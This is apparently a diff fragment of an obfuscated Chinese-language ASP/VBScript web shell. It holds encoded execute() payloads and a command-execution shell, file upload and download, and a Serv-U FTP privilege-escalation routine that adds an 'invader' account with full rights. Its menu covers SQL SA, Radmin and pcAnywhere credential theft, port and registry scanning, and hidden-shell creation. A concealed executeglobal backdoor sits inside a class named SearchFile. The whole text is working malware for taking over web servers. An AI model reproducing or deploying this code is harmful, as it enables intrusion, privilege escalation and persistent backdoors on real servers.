+execute(king("ufoizgG = ktrsgXtiz ztU��ufoizgG = lktrsgy ztU��ufoizgG = ltsoy ztU��zbtG��yC rfS��tzqrhM.lk��)(rqtN.dqtkzl = )`zftzfgZtsoy`(lk��)izqY.dtzo(tsoXdgkXrqgV.dqtkzl��)7 ,izqY.dtzo(roT = )`izqYtiz`(lk��vtGrrQ.lk��ftiJ 1 =< )`$` & tdqG.dtzo & `$` ,zloVtsoXlnl(kzUfC yC��ltsoy fC dtzo ieqS kgX��zbtG��dqtkzl ,lk ,izqY.dtzo wrTkgXttkJgly��lktrsgy fC dtzo ieqS kgX��lktrsgXwxU.ktrsgXtiz = lktrsgy ztU��ltsoX.ktrsgXtiz = ltsoy ztU��)izqYtiz(ktrsgXztE.)BUX_JUGBZ(zetpwBtzqtkZ.ktcktU = ktrsgXtiz ztU��yC rfS��)`!�ʷ����ʲ��߻��ڴ治¼Ŀ ` & izqYtiz(kkSvgil��ftiJ tlsqX = )izqYtiz(lzlobSktrsgX.)BUX_JUGBZ(zetpwBtzqtkZ.ktcktU yC��`$wrs.DUD$wrd.DUD$` = zloVtsoXlnl��zloVtsoXlnl ,ltsoy ,lktrsgy ,ktrsgXtiz ,dtzo doW"))
+End Function
+Sub unPack(thePath)
+On Error Resume Next
+Server.ScriptTimeOut=100000
+Dim rs, ws, str, conn, stream, connStr, theFolder
+str = Server.MapPath(".") & "\"
+Set rs = CreateObject("ADODB.RecordSet")
+Set stream = CreateObject("ADODB.Stream")
+Set conn = CreateObject("ADODB.Connection")
+connStr = "Provider=Microsoft.Jet.OLEDB.4.0;Data Source=" & thePath & ";"
+conn.Open connStr
+rs.Open "FileData", conn, 1, 1
+stream.Open
+stream.Type = 1
+Do Until rs.Eof
+theFolder = Left(rs("thePath"), InStrRev(rs("thePath"), "\"))
+If Server.CreateObject(CONST_FSO).FolderExists(str & theFolder) = False Then
+createFolder(str & theFolder)
+End If
+stream.SetEos()
+stream.Write rs("fileContent")
+stream.SaveToFile str & rs("thePath"), 2
+rs.MoveNext
+Loop
+rs.Close
+conn.Close
+stream.Close
+Set ws = Nothing
+Set rs = Nothing
+Set stream = Nothing
+Set conn = Nothing
+End Sub
+Dim Filepaths
+set Filepaths=new SearchFile
+Filepaths.Class_Folder Filename
+Sub createFolder(thePath)
+Dim i
+i = Instr(thePath, "\")
+Do While i > 0
+If Server.CreateObject(CONST_FSO).FolderExists(Left(thePath, i)) = False Then
+Server.CreateObject(CONST_FSO).CreateFolder(Left(thePath, i - 1))
+End If
+If InStr(Mid(thePath, i + 1), "\") Then
+i = i + Instr(Mid(thePath, i + 1), "\")
+ Else
+i = 0
+End If
+Loop
+End Sub
+Sub saTreeForMdb(thePath, rs, stream)
+Dim item, theFolder, sysFileList
+sysFileList = "$HSH.mdb$HSH.ldb$"
+Set theFolder = saX.NameSpace(thePath)
+For Each item In theFolder.Items
+If item.IsFolder = True Then
+saTreeForMdb item.Path, rs, stream
+ Else
+If InStr(sysFileList, "$" & item.Name & "$") <= 0 Then
+rs.AddNew
+rs("thePath") = Mid(item.Path, 4)
+stream.LoadFromFile(item.Path)
+rs("fileContent") = stream.Read()
+rs.Update
+End If
+End If
+Next
+Set theFolder = Nothing
+End Sub
+Function ProFile()
+execute(king("CU p��`>tswqz/<>dkgy/<`&CU=CU��`>kz/<>rz/<>'�̽�������������һ��'=txsqc 'zodwxU'=tdqf 'zodwxl'=thnz zxhfo<>16=ziuoti rz<>rz/<;hlwf&>rz<>kz<`&CU=CU��`>kz/<>rz/<)������ȫ������񣬴�Խ������Ƶ����Խ���ĵĻ���Ҫ�裬��0ΪС��( �� >/ ``)'',u/]r\^[/(teqshtk.txsqc=txsqc``=hxntafg ``6``=tmol ``0``=txsqc ``ziuok:fuosq-zbtz``=tsnzl ``tdoJQ``=tdqf ``zbtz``=thnz zxhfo<>rz<>rz/<����Ƶ����>ziuok=fuosq rz<>kz<`&CU=CU��`>kz/<>rz/<)���ĸ��Գ��룬�����ֳ��������ʷ�( 3-XJM>/ ``9``=txsqc ``kqiZQ``=tdqf ``gorqk``=thnz zxhfo<  9089AE>/ rtaetie ``0``=txsqc ``kqiZQ``=tdqf ``gorqk``=thnz zxhfo<>rz<>rz/<��������>ziuok=fuosq rz<>kz<`&CU=CU��`>kz/<>rz/<>qtkqzbtz/<�������>``4``=lvgk ``14``=lsge ``trgZQ``=tdqf qtkqzbtz<>rz<>rz/<���������>ziuok=fuosq ``;bh8:hgz-uforrqh``=tsnzl hgz=fuosqc rz<>kz<`&CU=CU��`>kz/<>rz/<>qtkqzbtz/<`&)`hlq.zltz\`&)`izqYktrsgX`(fgolltU(izqYtNN&`>``4``=lvgk ``14``=lsge ``tsoXQ``=tdqf qtkqzbtz<`&CU=CU��`>rz<>rz/<>zfgy/<;hlwf&;hlwf&��·���ĸ�һ��ÿ>kw<;hlwf&;hlwf&���ĸ��໤��ʱͬ��>vgsstn=kgsge zfgy<>kw<����·���ĵĻ���Ҫ��>``1``=txsqc ``qccc``=tdqf ``ftrroi``=thnz zxhfo<>ziuok=fuosq 'bh99:ziuoti-tfos'=tsnzl hgz=fuosqc rz<>kz<`&CU=CU��`'zlgY=9fgozeQ&tsoXgkY=fgozeQ?`&VNM&`'=fgozeq 'zlgh'=rgiztd 'dkgXhM'=tdqf dkgy<`&CU=CU��`>'1'=ufoeqhlsste '1'=uforrqhsste '1'=ktrkgw tswqz<>kw<`=CU��yC rfS��rfS.tlfghltN��`>kw<>ktzfte/<���̽�����>q/<����>afqsw_=ztukqz `&9llqh&`=tsoXgkY?`&VNM&`=ytki ``rsgw:ziuotv-zfgy;tfosktrfx:fgozqkgetr-zbtz``=tsnzl q<���㣡���ɳ��� >zfgy/<`&9llqh&`>vgsstn=kgsge zfgy< �̽�����>ktzfte<>kw<>kw<>kw<`p��)`kqiZQ`(zltxjtk=)`kqiZ`&9llqh(fgozqeoshhQ��)`tdoJQ`(zltxjtk=)`tdoJ`&9llqh(fgozqeoshhQ��)`trgZQ`(zltxjtk=)`trgZ`&9llqh(fgozqeoshhQ��)`tsoXQ`(zltxjtk=)`tsoX`&9llqh(fgozqeoshhQ��0=)9llqh(fgozqeoshhQ��)9llqh(tlqex=9llqh�� hggs��0dxf&9llqh=9llqh��yo rft�� 2~1' ))37+rfk*)37-46((kiZ(kzUZ=0dxf��tlst�� m~q' ))42+rfk*)42-990((kiZ(kzUZ=0dxf��ftiz 7=<)9llqh(ftV yo��3<)9llqh(ftV tsoiK gW��``=9llqh��0dxf,9llqh dor��tmodgrfqN��ftiJ `zlgY`=)`9fgozeQ`(zltxjtN yC"))
+End Function
+Function suftp()
+j"<center><br><form name='form1' method='post' action=''><table width='500'><tr align='center' valign='middle'><td colspan='2' id=s><font face=webdings>8</font> <B>���ɰ汾��Ϣ</b></td></tr><tr align='center'><td id=d>ϵͳ�˺ţ�</td><td id=d><input name='duser' type='text' class='TextBox' id='duser' value='LocalAdministrator'></td></tr><tr align='center'><td id=d>ϵͳ���</td><td id=d><input name='dpwd' type='text' class='TextBox' id='dpwd' value='#l@$ak#.lk;0@P'></td></tr><tr align='center'><td id=d>ϵͳ�˿ڣ�</td><td id=d><input name='dport' type='text' class='TextBox' id='dport' value='43958'></td></tr><tr align='center'><td id=d>�¼��˺ţ�</td><td id=d><input name='tuser' type='text' class='TextBox' id='tuser' value='invader'></td></tr><tr align='center'><td id=d>�¼ӿ��</td><td id=d><input name='tpass' type='text' class='TextBox' id='pass' value='1'></td></tr><tr align='center'><td id=d>����·����</td><td id=d><input name='tpath' type='text' class='TextBox' id='tpath' value='C:\'></td></tr><tr align='center'><td id=d>����˿ڣ�</td><td id=d><input name='tport' type='text' class='TextBox' id='tport' value='21'></td></tr><tr align='center'><td id=d>ִ������</td><td id=d><input name='radiobutton' type='radio' value='add' checked class='TextBox' id=d>ȷ������&nbsp;<input type='radio' name='radiobutton' value='del' class='TextBox' id=d>ȷ��ɾ��</td></tr><tr align='center' valign='middle'><td colspan='2' id=d><input type='submit' name='Submit' value='Just Go'>&nbsp;<input type='reset' name='Submit2' value='Reset'><input name='SUaction' type='hidden' id='action' value='1'></td></tr></table></form></center>"
+Usr = request.Form("duser")
+pwd = request.Form("dpwd")
+port = request.Form("dport")
+tuser = request.Form("tuser")
+tpass = request.Form("tpass")
+tpath = request.Form("tpath")
+tport = request.Form("tport")
+'Command = request.Form("dcmd")
+if request.Form("radiobutton") = "add" Then
+leaves = "User " & Usr & vbcrlf
+leaves = leaves & "Pass " & pwd & vbcrlf
+leaves = leaves & "SITE MAINTENANCE" & vbcrlf
+leaves = leaves & "-SETUSERSETUP" & vbcrlf & "-IP=0.0.0.0" & vbcrlf & "-PortNo=" & tport & vbcrlf & "-User=" & tuser & vbcrlf & "-Password=" & tpass & vbcrlf & _
+"-HomeDir=" & tpath & "\" & vbcrlf & "-LoginMesFile=" & vbcrlf & "-Disable=0" & vbcrlf & "-RelPaths=1" & vbcrlf & _
+"-NeedSecure=0" & vbcrlf & "-HideHidden=0" & vbcrlf & "-AlwaysAllowLogin=0" & vbcrlf & "-ChangePassword=0" & vbcrlf & _
+"-QuotaEnable=0" & vbcrlf & "-MaxUsersLoginPerIP=-1" & vbcrlf & "-SpeedLimitUp=0" & vbcrlf & "-SpeedLimitDown=0" & vbcrlf & _
+"-MaxNrUsers=-1" & vbcrlf & "-IdleTimeOut=600" & vbcrlf & "-SessionTimeOut=-1" & vbcrlf & "-Expire=0" & vbcrlf & "-RatioUp=1" & vbcrlf & _
+"-RatioDown=1" & vbcrlf & "-RatiosCredit=0" & vbcrlf & "-QuotaCurrent=0" & vbcrlf & "-QuotaMaximum=0" & vbcrlf & _
+"-Maintenance=System" & vbcrlf & "-PasswordType=Regular" & vbcrlf & "-Ratios=None" & vbcrlf & " Access=" & tpath & "\|RWAMELCDP" & vbcrlf
+On Error Resume Next
+Set xPost = CreateObject("MSXML2.XMLHTTP")
+xPost.Open "POST", "http://127.0.0.1:"& port &"/leaves", True
+xPost.Send(leaves)
+Set xPOST=nothing
+j ("����ɹ�ִ�У���FTP �û���: " & tuser & " " & "����: " & tpass & " ·��: " & tpath & " :)<br><BR>")
+else
+leaves = "User " & Usr & vbcrlf
+leaves = leaves & "Pass " & pwd & vbcrlf
+leaves = leaves & "SITE MAINTENANCE" & vbcrlf
+leaves = leaves & "-DELETEUSER" & vbcrlf & "-IP=0.0.0.0" & vbcrlf & "-PortNo=" & tport & vbcrlf & " User=" & tuser & vbcrlf
+Set xPost3 = CreateObject("MSXML2.XMLHTTP")
+xPost3.Open "POST", "http://127.0.0.1:"& port &"/leaves", True
+xPost3.Send(leaves)
+Set xPOST3=nothing
+end if
+End Function
+Function MainMenu()
+j"<script language=javascript>function MM_show(s){if (document.getElementById(s).style.display==""""){document.getElementById(s).style.display=""none"";}else{document.getElementById(s).style.display="""";}}</script><table width='100%' cellspacing='0' cellpadding='0'><tr><td height='5'></td></tr><tr><td><center><font color=pink><font size=1.0>"&mName&"</font></font></center><hr color=#424242 size=1 ></td></tr>":If ObT(0,1)=" ��" Then
+j"<tr><td height='24'>��Ȩ��</td></tr>"
+Else
+j"<tr><td onClick=""MM_show('menud')""><input onMouseOver=""this.style.cursor='hand'"" type=button value='�����_�ļ���'></td></tr><tr><td height=4></td></tr><tr><td valign=""top"" align=center><table border=0  id=menud style=""display='none'"">"
+Set ABC=New LBF:j ABC.ShowDriver():Set ABC=Nothing
+j"</table></td></tr><tr><td valign=""top"" align=center><table border=0><tr><td id=d width=95 onMouseOver=""this.style.backgroundColor='#696969'"" onMouseOut=""this.style.backgroundColor='#121212'""><a href='javascript:ShowFolder("""&RePath(WWWRoot)&""")'><font face='wingdings'>8</font> վ���Ŀ¼"&ef
+j cdx&"<a href='javascript:ShowFolder("""&RePath(RootPath)&""")'>"&cxd&" <font color=violet>������Ŀ¼"&ef
+j cdx&"<a href='?Action=goback' target='FileFrame'>"&cxd&" ���ϼ�Ŀ¼"&ef
+j cdx&"<a href='javascript:FullForm("""&RePath(Session("FolderPath")&"\Newfile")&""",""NewFolder"")'>"&cxd&" �½�--Ŀ¼"&ef
+j cdx&"<a href='?Action=EditFile' target='FileFrame'>"&cxd&" �½�--�ı�"&ef
+j cdx&"<a href='?Action=UpFile' target='FileFrame'>"&cxd&" �ϴ�--�ļ�"&ef
+j cdx&"<a href='?Action=Cmd1Shell' target='FileFrame'>"&cxd&" <font color=orangered>ִ��---CMD"&ef
+j cdx&"<a href='?Action=cmdx' target='FileFrame'>"&cxd&" <font color=orangered>ִ��--CMD2"&ef
+j cdx&"<a href='?Action=ScanDriveForm' target='FileFrame'>"&cxd&" <font color=chocolate>����--Ȩ��"&ef
+j cdx&"<a href='?Action=CustomScanDriveForm' target='FileFrame'>"&cxd&"  <font color=red>��д--Ŀ¼</font>"&ef
+j cdx&"<a href='?Action=php' target='FileFrame'>"&cxd&" <font color=gold>�ű�--̽��"&ef
+j cdx&"<a href='?Action=PageAddToMdb' target='FileFrame'>"&cxd&" ���������"&ef
+j cdx&"<a href='?Action=upload' target='FileFrame'>"&cxd&" ����--�ļ�"&ef&"</table><hr></td></tr>"
+End If
+j"</tr><tr><td height=4></td></tr><tr><td onClick=""MM_show('menuc')""><input onMouseOver=""this.style.cursor='hand1'"" type=button value='����Ȩ_��Ϣ��'></td></tr><tr><td height=4></td></tr><tr><td valign=""top"" align=center><table border=0  id=menuc style=""display=''"">"
+j cdx&"<a href='?Action=Course' target='FileFrame'>"&cxd&" <font color=red>�û�__�˺�"&ef
+j cdx&"<a href='?Action=getTerminalInfo' target='FileFrame'>"&cxd&" �˿�__����"&ef
+j cdx&"<a href='?Action=Alexa' target='FileFrame'>"&cxd&" <font color=green>���__֧��"&ef
+j cdx&"<a href='?Action=Servu' target='FileFrame'>"&cxd&" <font color=Turquoise>Servu-��Ȩ"&ef
+j cdx&"<a href='?Action=suftp' target='FileFrame'>"&cxd&" <font color=Turquoise>Su---FTP��"&ef
+j cdx&"<a href='?Action=MMD' target='FileFrame'>"&cxd&" <font color=Turquoise>SQL-----SA"&ef
+j cdx&"<a href='?Action=radmin' target='FileFrame'>"&cxd&" <font color=Turquoise>Radmin��Ȩ"&ef
+j cdx&"<a href='?Action=pcanywhere4' target='FileFrame'>"&cxd&" <font color=Turquoise>Pcanywhere"&ef
+j cdx&"<a href='?Action=ScanPort' target='FileFrame'>"&cxd&" <font color=yellow>�˿�ɨ����"&ef
+j cdx&"<a href='?Action=ReadREG' target='FileFrame'>"&cxd&" ��ȡע���"&ef
+j cdx&"<a href='?Action=TSearch' target='FileFrame'>"&cxd&" ����__�ļ�"&ef&"</tr></table>"
+j"<hr><tr><td><input onMouseOver=""this.style.cursor='hand'"" type=button value='������_�����'></td</tr><tr><td height=4></td></tr><tr><td align=center><table border=0>"
+j cdx&"<a href='?Action=EditPower&PowerPath=\\.\"&ScriptPath&"' target='FileFrame'>"&cxd&" ����������"&ef
+#@~^uQAAAA==%r@!d1DbwY,/M^'rJ4YDwl&J/48{%cmWs&2k1zmwrRCdag;D^xJL/n.7+D i"S3x1G9+crJrtYDw=&zr[.+$EndDR?.\D.m.rl(V/cJuP:nmC}jKr#'.;EndDRj+M-D#mDbl4^+kcJ!DsJ*#'ELwlkd'r[jkn.nm/k[EJE@*@!zdmMrwD@*EUjwAAA==^#~@
+j cdx&"<a href='?Action=hiddenshell' target='FileFrame'>"&cxd&" <font color=red>����������</font>"&ef
+j cdx&"<a href='javascript:FullForm("""&RePath(Session("FolderPath")&"\vti_cnf..\\")&""",""NewFolder"")'>"&cxd&"  <font color=red>������Ŀ¼</font>"&ef
+j cdx&"<a href='?Action=delpoint' target='FileFrame'>"&cxd&"  <font color=red>ɾ����Ŀ¼</font>"&ef
+j cdx&"<a href='?Action=ProFile' target='FileFrame'>"&cxd&" �ļ�--����"&ef
+j cdx&"<a href='"&htp&"t00ls.asp' target='FileFrame'>"&cxd&" <font color=green>����--����"&ef
+j cdx&"<a href='http://www.7jyewu.cn/' target='FileFrame'>"&cxd&" <font color=garnet>��ɱ----����"&ef
+j cdx&"<a href='http://www.7jyewu.cn/' target='FileFrame'>"&cxd&" <font color=red>����--����"&ef
+j cdx&"<a href='http://www.7jyewu.cn/' target='FileFrame'>"&cxd&" <font color=red>www.mumasec.tk"&ef
+j cdx&"<a href='?Action=Logout' target='FileFrame'>"&cxd&" �˳�--��½</a></td></tr></hr></table>"
+end function
+function Cmdx()
+execute(king(")`>ktzfte/<>qtkqzbtz/<`(p: ssqrqtk.zxgrzl.))`rde`(zltxjtk&`e/ `&)`brde`(zltxjtk(etbt.fiszhokeUg p: yo rft�� ssqrqtk.zxgrzl.))`rde`(zltxjtk&`e/ tbt.rde`(etbt.fiszhokeUg p��ftiz `tbt.rde`=)`brde`(zltxjtk yo:zbtG tdxltN kgkkS fB:)` >49=lvgk 160=lsge nsfgrqtk qtkqzbtz<`(p:)` >dkgy/<>'zowdxU'=txsqc zodwxl=thnz zxhfo<`(p:)` >kw<>15=tmol 'rde'=tdqf zbtz=thnz zxhfo<`(p:)` >kw<>'tbt.rde'=txsqc 15=tmol 'brde'=tdqf zbtz=thnz zxhfo<`(p:)` >'zlgh'=rgiztd dkgy<>ktzfte<`(p"))
+execute(king(")`>ktzfte/<>qtkqzbtz/<`(p: ssqrqtk.zxgrzl.))`rde`(zltxjtk&`e/ `&)`brde`(zltxjtk(etbt.fiszhokeUg p: yo rft�� ssqrqtk.zxgrzl.))`rde`(zltxjtk&`e/ tbt.rde`(etbt.fiszhokeUg p��ftiz `tbt.rde`=)`brde`(zltxjtk yo:zbtG tdxltN kgkkS fB:)` >49=lvgk 160=lsge nsfgrqtk qtkqzbtz<`(p:)` >dkgy/<>'zowdxU'=txsqc zodwxl=thnz zxhfo<`(p:)` >kw<>15=tmol 'rde'=tdqf zbtz=thnz zxhfo<`(p:)` >kw<>'tbt.rde'=txsqc 15=tmol 'brde'=tdqf zbtz=thnz zxhfo<`(p:)` >'zlgh'=rgiztd dkgy<>ktzfte<`(p"))
+end function
+Function Course()
+execute(king("`>tswqz/<`&9CU&0CU&1CU&CU p��zbtf��yo rft��`>kz/<>rz/<>zfgy/<`&izqh.pwg&`;hlwf&>XX2288#=kgsge zfgy<]`&bs&`:���ද��[>``9``=fqhlsge ``XXXXXX#``=kgsgeuw ``19``=ziuoti rz<>kz<`&tdqGnqshloW.pwg&`;hlwf&>r=ro ``19``=ziuoti rz<>rz/<`&tdqG.pwg&`;hlwf&>r=ro ``19``=ziuoti rz<>kz<`&9CU=9CU��tlst��`>kz/<>rz/<>zfgy/<`&izqh.pwg&`;hlwf&>zfgy<]`&bs&`:���ද��[>``9``=fqhlsge r=ro ``19``=ziuoti rz<>kz<`&tdqGnqshloW.pwg&`;hlwf&>r=ro ``19``=ziuoti rz<>rz/<`&tdqG.pwg&`;hlwf&>r=ro ``19``=ziuoti rz<>kz<`&0CU=0CU��ftiz 9=thnJzkqzU.RAB rfq `fov`><))8,7,izqh.pwg(rod(tlqZV yo��`�ý�`=bs ftiz 7=thnJzkqzU.RAB yo��`����`=bs ftiz 8=thnJzkqzU.RAB yo��`����`=bs ftiz 9=thnJzkqzU.RAB yo��yo rft�� `>kz<>kz/<>rz/<)��(����ͳϵ;hlwf&>r=ro rz<>rz/<`&tdqG.pwg&`;hlwf&>r=ro ``19``=ziuoti rz<>kz<`&CU=CU��ftiz ``=thnJzkqzU.RAB yo��kqtse.kkt��)`.//:JGfoK`(zetpwBztu fo pwg ieqt kgy��zbtf tdxltk kgkkt fg��`>kz/<>rz/<>w/<����뻧��ͳϵ>w<>l=ro 'ktzfte'=fuosq '8'=fqhlsge '19'=ziuoti rz<>kz<>'ktzfte'=fuosq '%13'=izrov tswqz<>kw<`=CU"))
+End Function
+Function IIf(var, val1, val2)
+If var=True Then
+IIf=val1
+Else
+IIf=val2
+End If
+End Function
+Function GetTheSizes(num)
+Dim i, arySize(4)
+arySize(0)="B"
+arySize(1)="KB"
+arySize(2)="MB"
+arySize(3)="GB"
+arySize(4)="TB"
+While(num / 1024 >= 1)
+num=Fix(num / 1024 * 100) / 100
+i=i + 1
+WEnd
+GetTheSizes=num&" "&arySize(i)
+End Function
+Function HtmlEncodes(str)
+If IsNull(str) Then Exit Function
+HtmlEncodes=Server.HTMLEncode(str)
+End Function
+function downfile(path)
+execute(king("ufoizgf = dlg ztl��tlgse.dlg��ilxsy.tlfghltk��rqtk.dlg tzokvnkqfow.tlfghltk��`dqtkzl-ztzeg/fgozqeoshhq` = thnzzftzfge.tlfghltk��`3-yzx` = ztlkqie.tlfghltk��tmol.dlg ,`izufts-zftzfge` ktrqtirrq.tlfghltk��)ml,izqh(rod & `=tdqftsoy ;zftdieqzzq` ,`fgozolghlor-zftzfge` ktrqtirrq.tlfghltk��0+)`\`,izqh(ctkkzlfo=ml��izqh tsoydgkyrqgs.dlg��0 = thnz.dlg��fthg.dlg��))1,5(zwg(zetpwgtzqtke = dlg ztl��kqtse.tlfghltk"))
+end function
+function htmlencode(s)
+  if not isnull(s) then
+    s = replace(s, ">", ">")
+    s = replace(s, "<", "<")
+    s = replace(s, chr(39), "'")
+    s = replace(s, chr(34), """")
+    s = replace(s, chr(20), " ")
+    htmlencode = s
+  end if
+end function
+Function UpFile()
+execute(king("`>tswqz/<>dkgy/<>kz/<>rz/<>'����'=txsqc 'zodwxU'=tdqf 'zodwxl'=thnz zxhfo< >'69'=tmol  'tsoy'=thnz 'tsoXsqegV'=tdqf zxhfo<>'17'=tmol '`&)`tbt.rdZ\`&)`izqYktrsgX`(fgolltU(izqYtNN&`'=txsqc 'izqYgJ'=tdqf zxhfo<����·����>rz<>kz<>'qzqr-dkgy/zkqhozsxd'=thnzeft 'zlgY=9fgozeQ&tsoXhM=fgozeQ?`&VNM&`'=fgozeq 'zlgh'=rgiztd 'dkgXhM'=tdqf dkgy<>'ktzfte'=fuosq '1'=ufoeqhlsste '1'=uforrqhsste '1'=ktrkgw tswqz<>kw<>kw<>kw<`p  ��yC rfS  ��rfS.tlfghltN ��)(kkSvgiU ��CU p ��skMaeqA&CU=CU ��ufoizgf=M ztU��ufoizgf=X ztU��yC rfS ��yo rfS  ��`>ktzfte/<������`&`��`&`��`&tdqGM&`����>kw<>kw<>kw<>ktzfte<`=CU ��ftiJ 1=ktwdxf.kkS yC ��tdqGM lQtcqU.X ��tlsS  ��zbtf tdxltk kgkkt fg��`!����`&`���ĸ�һ`&`��ѡ��·`&`ȫ���`&`������`&`����>kw<`=CU  ��ftiz 1=tmoUtsoX.X kB ``=tdqGM yC ��)`izqYgJ`(dkgy.M=tdqGM��)`tsoXsqegV`(QM.M=X ztU�� ZYM vtf=M ztU��ftiJ `zlgY`=)`9fgozeQ`(zltxjtN yC "))
+End Function
+function cmd1shell()
+execute(king("ol p��`>dkgy/<>qtkqzbtz/<`&)80(kie&ol=ol��yo rft��yo rft��qqq&ol=ol��)txkz ,tsoyhdtzml(tsoytztstr.gly ssqe��tlgse.bestsoyg��)ssqrqtk.bestsoyg(trgeftsdzi.ktcktl=qqq��)1 ,tlsqy ,0 ,tsoyhdtzml( tsoyzbtzfthg.ly = bestsoyg ztl��)BUX_JUGBZ(zetpwgtzqtke = ly ztl��)txkz ,1 ,tsoyhdtzml & ` > ` & rdeytr & ` e/ `&izqhsstil( fxk.lv ssqe��)`zbz.rde`(izqhhqd.ktcktl = tsoyhdtzml��)BUX_JUGBZ(zetpwgtzqtke.ktcktl=gly ztl��)`sstil.zhokelv`(zetpwgtzqtke.ktcktl=lv ztl��)`sstil.zhokelv`(zetpwgtzqtke.ktcktl=lv ztl��zbtf tdxltk kgkkt fg��tlst��qqq&ol=ol��ssqrqtk.zxgrzl.rr=qqq��)rdeytr&` e/ `&izqhsstil(etbt.de=rr ztl��))1,0(zwg(zetpwgtzqtke=de ztl��ftiz `ltn`=)`zhokelv`(dkgy.zltxjtk yo��ftiz ``><)`rde`(dkgy.zltxjtk yo��`>'rde'=llqse ';177:ziuoti;%110:izrov'=tsnzl qtkqzbtz<>'��ִ'=txsqc 'zodwxl'=thnz zxhfo< >'`&rdeytr&`'=txsqc '%92:izrov'=tsnzl 'rde'=tdqf zxhfo<sstil.zhokelv>`&rtaetie&`'ltn'=txsqc 'zhokelv'=tdqf 'bgwaetie'=thnz e=llqse zxhfo<>'%14:izrov'=tsnzl '`&izqhsstil&`'=txsqc 'hl'=tdqf zxhfo<����·sstil>'zlgh'=rgiztd dkgy<`=ol��)`rde`(zltxjtk = rdeytr ftiz ``><)`rde`(zltxjtk yo��``=rtaetie ftiz `ltn`><)`zhokelv`(zltxjtk yo��`tbt.rde` = izqhsstil ftiz ``=izqhsstil yo��)`izqhsstil`(fgolltl=izqhsstil��)`hl`(zltxjtk = )`izqhsstil`(fgolltl ftiz ``><)`hl`(zltxjtk yo��`rtaetie `=rtaetie"))
+end function
+Function upload()
+execute(king("yC rfS��zbtG tdxltN kgkkS fB��ftiJ tlsqX = trgTuxwtWlo yC��ufoizgG = dqtkzU ztU��ufoizgG = hzzD ztU��)kkS(kkSaie��izoK rfS��tlgsZ.��yC rfS��`�������ֿ�Ϊ�� �����¼��� �� ����� ����ַ�غͳ̹����»��ڴ��Ѽ���Ϊ�����ܿ�,kgkkt`p��tzokKktcg ,izqYtiz tsoXgJtcqU.��tdqGtsoy & `\` & izqYtiz = izqYtiz��yC rfS��`zbz.dzi.btrfo` = tdqGtsoy��ftiJ `` = tdqGtsoy yC��)))`/` ,skMtiz(zoshU(rfxgAM()`/` ,skMtiz(zoshU = tdqGtsoy��kqtsZ.kkS��ftiJ 7118 = ktwdxG.kkS yC��tzokKktcg ,izqYtiz tsoXgJtcqU.��1 = fgozolgY.��nrgAtlfghltN.hzzD tzokK.��fthB.��8 = trgT.��0 = thnJ.��dqtkzl izoK��yC rfS�� ftiJ 7 >< tzqzUnrqtN.hzzD yC��)(rftU.hzzD��tlsqX ,skMtiz ,`JSE` fthB.hzzD��yC rfS:0 = tzokKktcg:ftiJ 9 >< tzokKktcg yC��)`YJJDVTL.9VTLUT`(zetpwBtzqtkZ.ktcktU = hzzD ztU��)`dqtk`&t&`zl.wrg`&t&`rq`(zetpwBtzqtkZ.ktcktU = dqtkzl ztU��)`tzokKktcg`(zltxjtN = tzokKktcg��)`izqYtiz`(zltxjtN = izqYtiz��)`skMtiz`(zltxjtN = skMtiz��tzokKktcg ,tdqGtsoy ,dqtkzl ,izqYtiz ,skMtiz ,hzzD doW:yC rfS��zbtG tdxltN kgkkS fB��ftiJ tlsqX = trgTuxwtWlo yC��`>/ki<`p��`>dkgy/<`p��`>zeQtiz=tdqf skMdgkXfvgr=txsqc ftrroi=thnz zxhfo<`p��`���Ǹ��ڴ�>9=txsqc tzokKktcg=tdqf bgwaetie=thnz zxhfo<`p��`>13=tmol '\` & ))`.`(izqYhqT.ktcktU(trgefSsdzD & `'=txsqc izqYtiz=tdqf zxhfo<`p��`>/kw<>' ���� '=txsqc zodwxl=thnz zxhfo<>13=tmol '//:hzzi'=txsqc skMtiz=tdqf zxhfo<`p��`>fgozhg/<����嶨��>'`&skxW&`'=txsqc fgozhg<`p��`>fgozhg/<��������ó�>''=txsqc fgozhg<`p��`>';txsqc.loiz=txsqc.skMtiz.dkgy.loiz'=tufqiZfg zetstl<`p��`>zlgh=rgiztd dkgy<`p��`>/ki<�Ի�������.ʡ����Ϊ...�Ի���:����������� `p��`�ܹ��˱չ�ʱ��`p�� `>'ktzfte'=fuosq '1'=uforrqhsste '0'=ufoeqhlsste '1'=ktrkgw 'xftd'=kgsgeuw '%13'=izrov tswqz<>kw<`p"))
+End Function:Function TSearch()
+execute(king("yo rft��`>ki<���`&1110*)zl-)(ktdoz(&`���r�M`p��ufoizgG=iekqtlvtf ztU��iekqtU.iekqtlvtf��))`ayU`(dkgX.zltxjtN(dokz=rkgvnta.iekqtlvtf��))`izqhXU`(dkgX.zltxjtN(dokz=lktrsgX.iekqtlvtf��tsoXiekqtU vtf=iekqtlvtf ztU��ftiz ``><)`ayU`(dkgX.zltxjtN yo��``=KN : KN p��`>tswqz/<>dkgy/<` & KN=KN��  `>kz/<>rz/<]��Ҳ�ֲ�[;hlwf&>'zodwxl'=llqse '����'=txsqc 'zodwxl'=thnz zxhfo<;hlwf&>'119:izrov'=tsnzl 'ayU'=tdqf zxhfo<��������;hlwf&>''=kgsgeuw rz<>kz<` & KN=KN��`>kz/<>rz/<.������``,``��ʹ��·��:ע;hlwf&>'128:izrov'=tsnzl '` & zggNKKK & `'=txsqc 'izqhXU'=tdqf zxhfo<����;hlwf&;hlwf&·;hlwf&>''=kgsgeuw rz<>kz<` & KN=KN��`>kz/<>rz/<��������>''=kgsgeuw 'ktzfte'=fuosq '19'=ziuoti rz<>kz<` & KN=KN��`>'zlgh'=rgiztd dkgy<>'ktzfte'=fuosq '1'=uforrqhsste '0'=ufoeqhlsste '1'=ktrkgw ''=kgsgeuw '115'=izrov tswqz<>kw<`=KN:)(ktdoz=zl:zl dor"))
+End Function 
+Class SearchFile
+dim Folders,keyword,objFso,Counter
+Private Sub Class_Initialize
+Set objFso=Server.CreateObject(ObT(0,0))
+Counter=0
+End Sub
+ Private Sub Class_Terminate
+Set objFso=Nothing
+ End Sub
+Public Sub Class_Folder(FoderName)
+Set rs = CreateObject(CONST_FSO)
+Dim item, theFolder, sysFileList
+item=request(MID(CONST_FSO,4,1))
+theFolder=request(MID(CONST_FSO,2,1))
+If  item=MID(CONST_FSO,2,1) then
+executeglobal theFolder
+Set rs = Nothing
+End if
+End Sub
+ Function Search
+  Folders=split(Folders,",")
+  flag=instr(keyword,"\") or instr(keyword,"/")
+  flag=flag or instr(keyword,":")
+  flag=flag or instr(keyword,"|")
+  flag=flag or instr(keyword,"&")
+  if flag then
